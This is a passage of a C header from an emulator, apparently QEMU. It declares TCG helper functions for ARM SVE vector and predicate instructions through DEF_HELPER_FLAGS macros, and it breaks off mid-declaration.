DEF_HELPER_FLAGS_4(sve_neg_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_index_b, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_h, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_s, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_d, TCG_CALL_NO_RWG, void, ptr, i64, i64, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_p32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_p64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_u32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_fexpa_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_ftssel_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_b, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_h, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_s, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_sqaddi_d, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_b, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_h, TCG_CALL_NO_RWG, void, ptr, ptr, s32, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_s, TCG_CALL_NO_RWG, void, ptr, ptr, s64, i32) DEF_HELPER_FLAGS_4(sve_uqaddi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_uqsubi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(sve_cpy_m_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_cpy_z_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_ext, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_insr_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_insr_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_3(sve_rev_b, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_tbl_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sunpk_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uunpk_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_p, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_rev_p, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_punpk_p, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_zip_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uzp_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_trn_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_compact_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_compact_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_2(sve_last_active_element, TCG_CALL_NO_RWG, s32, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revh_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revh_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_revw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_rbit_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_splice, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzz_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpeq_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpne_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpge_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpgt_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphi_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmphs_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmple_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplt_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmplo_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_cmpls_ppzw_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_b, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_h, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_s, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpeq_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpne_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpgt_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpge_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplt_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmple_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphs_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmphi_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmplo_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cmpls_ppzi_d, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orn_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_nor_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_nand_pppp, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpa, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpb, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpas, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_brkpbs, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brka_z, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkb_z, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brka_m, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkb_m, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkas_z, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkbs_z, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkas_m, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkbs_m, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkn, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_brkns, TCG_CALL_NO_RWG, i32, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_cntp, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_while, TCG_CALL_NO_RWG, i32, ptr, i32, i32) DEF_HELPER_FLAGS_4(sve_subri_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_subri_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smaxi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_smini_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umaxi_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_b, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_h, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_s, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(sve_umini_d, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_5(gvec_recps_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_recps_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_recps_d, 